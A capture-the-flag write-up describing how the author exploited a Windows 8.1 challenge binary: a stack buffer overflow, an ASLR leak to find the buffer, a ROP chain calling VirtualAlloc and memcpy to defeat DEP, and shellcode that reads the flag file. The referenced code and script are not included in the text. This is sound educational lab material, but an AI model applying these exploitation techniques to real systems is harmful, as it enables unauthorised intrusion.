For this challenge, we’re given an
.exe file and a server that it’s running on. Running strings on the binary, we see that there’s a lot of text in the program. It’s all instructions on how to get started with Windows exploitation. One block that is particularly interesting is:
So, looking at where this string is used we can see that it’s printed out, and then a function is called that has
ReadFile inside of it.
I think it’s safe to guess that the 0×800(2048) passed to that function is the amount to read, and that
ReadFile is reading from input. Above that call we can see
sub esp, 400h which is making only 0×400 bytes of room on the stack… so we have a classic buffer overflow!
One problem though. We don’t know where our buffer is! This problem description said this is a Windows 8.1 challenge, so we have to deal with ASLR and DEP(aka stack is not executable).
So, when running the binary, we get a prompt for a password. Inputting
GreenhornSecretPassword!!! works and we get a menu. One of the options is (A)SLR. This will print out the address of a variable on the stack as well as the program base address. We figure that two variables on the stack will be the same distance apart from each-other on different systems, so we can use this to get the address of our vulnerable buffer! Starting it in a debugger, getting the ASLR variable printout, and setting a breakpoint in the vulnerable function… we subtract the address of the buffer at the breakpoint from the address printed and we’ve got our offset from the ASLR leak to our buffer:
inputBuffer = aslrLeak-0x3F8
That took care of ASLR. But how do we get around DEP? Return Oriented Programming is the answer. On Windows, the flow we need goes like this:
- VirtualAlloc a section of Readable, Writable, Executable memory to execute from.
memcpyour shellcode into this region of memory from wherever our input is
- call the executable shellcode buffer.
So, using this knowledge, we build a ROP chain. To get started, we need to know where the first return address is on the stack compared to our input buffer. We do this in our debugger by just stepping to the first
ret after our input buffer is read in. The return address will be the first value on the stack, and we can subtract that stack address from the address we knew our buffer was at. This gives us
inputBuffer+0x402 as our first return address overwrite, and this will be where the ROP chain starts.
ret will execute, pop the address we put at
inputBuffer+0x402 off the stack, and execute at that address. We want to call VirtualAlloc…and a function that just calls VirtualAlloc is in the binary, so on our ROP chain we can put an offset from the base of the program to that.
So, we’ve got execution going back to a function that VirtualAllocs, we need to set up arguments for it on the stack correctly. ESP is now pointing to the next spot in our ROP chain, and if we look at the VAlloc function we can see that
this next spot + 4 is where the first argument is(and the next arguments are after that). Note that there is a
push ebp at the beginning of the func that adds a 4 byte value to the stack, which makes the arguments in our rop(that would otherwise start at
esp+4) coresspond to
esp+8 in the assembly.
So, we can make our chain:
Now, we can step through the function and we’ll see that when it gets to the
ret, the value at ESP is our first 0 that didn’t matter to us at the time. This is one of the very important parts of ROP — we need to advance the stack past the values we had to have on the stack for this function call. This will place ESP at the next open spot in our ROP chain.
But how do we do this? Well, we know that 0 we didn’t care about will be the next address to be executed. We know that there’s 16 bytes of data after it that ESP needs to get past. We use something called a
ROP gadget to do this. The ROP gadget we need should take 16 bytes off the stack and then return to the first value after that. We can find one at offset 0x99E in the binary:
Remember our strategy from before? The next thing we need to call after this is
memcpy to copy our input buffer into the RWX space. Naturally, the next ROP entry will be the address of a memcpy occurrence in the binary, then a gadget to clean up the stack by 4*number of arguments, then the next function…
But wait! Arguments for memcpy: destination, source, size. The destination should be our RWX buffer…which we don’t know until VAlloc is called. Luckily, the VAlloc function above has a fourth argument that represents an address to write the buffer address to. We can set that argument to
ropStart+0x22 to point to a value we’ll leave as 0 when we build our ROP. So, we have:
This is all there is to the ROP chain! The last entry to it is the address of a gadget that does “call eax” — because, luckily, eax happened to contain the RWX buffer after everything was done and copied.
We have our ROP chain copying the input buffer over and trying to call it. Now we need to give it some valid shellcode. If we look at the vulnfn there is a small restriction, though:
Haha, OK, so it wants any of the letters in “CSAW” to occur in the first 4 bytes of the input buffer. We can make that happen:
The V is just to indicate we want the program to go to the vulnerable function, the input buffer starts after it. The code assembles to:
The 53h satisfies the check for an S at index 2 and it passes the checks.
Getting into Windows Shellcoding is beyond the scope of this writeup, but the gist of my shellcode is:
- Get addresses of useful functions from kernel32.dll(CreateFile, ReadFile)
- Get address of output-to-user function from module base
- Createfile “key”
- ReadFile the handle returned by CreateFile
- Call the output-to-user fn with the buffer read in.
Do all of this, and we get the flag output back to us.
My shellcode is more than a little hairy, as I store all the useful stuff arbitrarily on the stack without setting the stack up at the beginning like a normal function would. Don’t trust the comments, they might be outdated.
Here it is:
And here's the full ruby script: